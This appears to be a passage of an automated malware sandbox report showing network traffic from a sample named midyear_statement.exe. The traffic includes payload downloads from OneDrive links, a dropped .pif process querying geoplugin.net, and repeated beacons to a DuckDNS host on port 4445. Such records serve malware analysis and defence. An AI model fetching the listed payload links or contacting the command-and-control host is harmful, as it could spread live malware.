                                                                                                                                                                                        Mar 28, 2024 13:59:31.055985928 CET49722443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:31.055991888 CET4434972213.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.233990908 CET49724443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.234036922 CET4434972413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.234093904 CET49724443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.237242937 CET49724443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.237287045 CET4434972413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.237343073 CET49724443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.295782089 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.295808077 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.295912027 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.296305895 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.296322107 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.604036093 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.604165077 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.605699062 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.605705976 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.605989933 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.607290983 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.652239084 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.898469925 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.898576975 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.898638010 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.898785114 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.898785114 CET49725443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:33.898808002 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:33.898818016 CET4434972513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.348828077 CET49727443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.348862886 CET4434972713.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.348932981 CET49727443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.362474918 CET49727443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.362515926 CET4434972713.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.362616062 CET49727443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.613954067 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.613996029 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.614068985 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.615299940 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.615314960 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.922312975 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.922373056 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.928895950 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.928915977 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.929172993 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:36.978310108 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:36.979087114 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:37.024240017 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:37.426786900 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:37.426882982 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:37.426975965 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:37.429744005 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:37.429764032 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:37.429778099 CET49728443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:37.429784060 CET4434972813.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.530673981 CET49730443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.530709028 CET4434973013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.530795097 CET49730443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.530963898 CET49730443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.530998945 CET4434973013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.531059980 CET49730443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.553980112 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.554014921 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.554130077 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.554477930 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.554492950 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.861382961 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.861449957 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.862847090 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.862855911 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.863133907 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.864408016 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.912237883 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286319017 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286426067 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286550999 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286900043 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286916971 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286942959 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286947966 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397531033 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397578001 CET4434973313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397670984 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397762060 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397793055 CET4434973313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397846937 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462028980 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462073088 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462148905 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462493896 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462507963 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.769618034 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.769857883 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.771321058 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.771331072 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.771603107 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.772902012 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.820239067 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.032602072 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.033870935 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124510050 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124588013 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124655008 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124792099 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124809980 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124820948 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124825954 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.247692108 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:11.045365095 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:11.048857927 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:00:11.264569998 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:41.068749905 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:41.069926023 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:00:41.280073881 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:05.998563051 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:06.591893911 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:07.591907978 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:09.388843060 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:11.129256964 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:11.130606890 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:01:11.344264030 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:13.091897964 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:20.189464092 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:34.404611111 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:41.205302954 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:41.208066940 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:01:41.411581993 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:11.518625975 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:11.520525932 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:02:11.734584093 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:41.585120916 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:41.586486101 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:02:41.801718950 CET444549708192.3.109.132192.168.2.7

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Mar 28, 2024 13:58:58.458333969 CET5011053192.168.2.71.1.1.1
                                                                                                                                                                                        Mar 28, 2024 13:58:59.342339039 CET5825453192.168.2.71.1.1.1
                                                                                                                                                                                        Mar 28, 2024 13:59:01.548681021 CET5254253192.168.2.71.1.1.1
                                                                                                                                                                                        Mar 28, 2024 13:59:03.433383942 CET6316053192.168.2.71.1.1.1
                                                                                                                                                                                        Mar 28, 2024 13:59:14.766247034 CET6296053192.168.2.71.1.1.1
                                                                                                                                                                                        Mar 28, 2024 13:59:14.901407003 CET53629601.1.1.1192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.059748888 CET4999153192.168.2.71.1.1.1
                                                                                                                                                                                        Mar 28, 2024 13:59:16.157485962 CET53499911.1.1.1192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:28.080483913 CET5483353192.168.2.71.1.1.1

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Mar 28, 2024 13:58:58.458333969 CET192.168.2.71.1.1.10xcdd8Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:58:59.342339039 CET192.168.2.71.1.1.10xea44Standard query (0)abqscw.sn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:01.548681021 CET192.168.2.71.1.1.10x5c95Standard query (0)aborlw.sn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:03.433383942 CET192.168.2.71.1.1.10x589aStandard query (0)abpoxw.sn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:14.766247034 CET192.168.2.71.1.1.10xf88Standard query (0)www.zuckdgreb.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:16.059748888 CET192.168.2.71.1.1.10xf4d5Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:28.080483913 CET192.168.2.71.1.1.10xd12dStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Mar 28, 2024 13:58:58.554639101 CET1.1.1.1192.168.2.70xcdd8No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:58:58.554639101 CET1.1.1.1192.168.2.70xcdd8No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:58:58.554639101 CET1.1.1.1192.168.2.70xcdd8No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:58:58.554639101 CET1.1.1.1192.168.2.70xcdd8No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:58:58.554639101 CET1.1.1.1192.168.2.70xcdd8No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:58:59.486609936 CET1.1.1.1192.168.2.70xea44No error (0)abqscw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:58:59.486609936 CET1.1.1.1192.168.2.70xea44No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:01.684077024 CET1.1.1.1192.168.2.70x5c95No error (0)aborlw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:01.684077024 CET1.1.1.1192.168.2.70x5c95No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:03.562817097 CET1.1.1.1192.168.2.70x589aNo error (0)abpoxw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:03.562817097 CET1.1.1.1192.168.2.70x589aNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:14.901407003 CET1.1.1.1192.168.2.70xf88No error (0)www.zuckdgreb.duckdns.org192.3.109.132A (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:16.157485962 CET1.1.1.1192.168.2.70xf4d5No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:28.175837040 CET1.1.1.1192.168.2.70xd12dNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:28.175837040 CET1.1.1.1192.168.2.70xd12dNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:28.175837040 CET1.1.1.1192.168.2.70xd12dNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:28.175837040 CET1.1.1.1192.168.2.70xd12dNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                        Mar 28, 2024 13:59:28.175837040 CET1.1.1.1192.168.2.70xd12dNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • onedrive.live.com
                                                                                                                                                                                        • geoplugin.net

                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.749712178.237.33.50807896C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Mar 28, 2024 13:59:16.440784931 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Mar 28, 2024 13:59:16.624198914 CET1197INHTTP/1.1 200 OK
                                                                                                                                                                                        date: Thu, 28 Mar 2024 12:59:16 GMT
                                                                                                                                                                                        server: Apache
                                                                                                                                                                                        content-length: 989
                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 44 43 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 31 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 36 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"102.165.48.43", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Washington", "geoplugin_region":"District of Columbia", "geoplugin_regionCode":"DC", "geoplugin_regionName":"District of Columbia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.894", "geoplugin_longitude":"-77.0365", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.74970013.107.139.114436428C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:58:59 UTC213OUTGET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:58:59 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abqscw.sn.files.1drv.com/y4m-zYwpFACL5iXnxCgcfUGrba1rEn19VhjL7w-TerMTn_xp_gGpLreK-PlTDk9AFPAMe5HsUP3qj-MGltyTCGj4aJi9EHD48Te8_jT09vDvox1G7prWDzTDfk9sLUsrB_YQnpiMbMl2L_RIMZ7RQGUqIfg2_aWYOD_Pf0xfL4oorqUMJfgr9B01DU89645jiAwNuQsuLfJp-KkNbE5nCYQhg/255_Dhuirrkwdxq?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:URKe1SZP3Ig=:LoLtWqQ1Z3eNsf6TMSuHA8hrfNoAFzXtZhZwDi+vM+k=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=5f93dee4-b388-46b0-9f44-6492dcd13c0f&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:18:59 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:58:59 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 68d84894c4-7pvdx
                                                                                                                                                                                        X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: B647429216164F639415A983F6774A3F Ref B: BN3EDGE0814 Ref C: 2024-03-28T12:58:59Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:58:58 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.74970313.107.139.114436428C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:01 UTC213OUTGET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:01 UTC1181INHTTP/1.1 302 Found
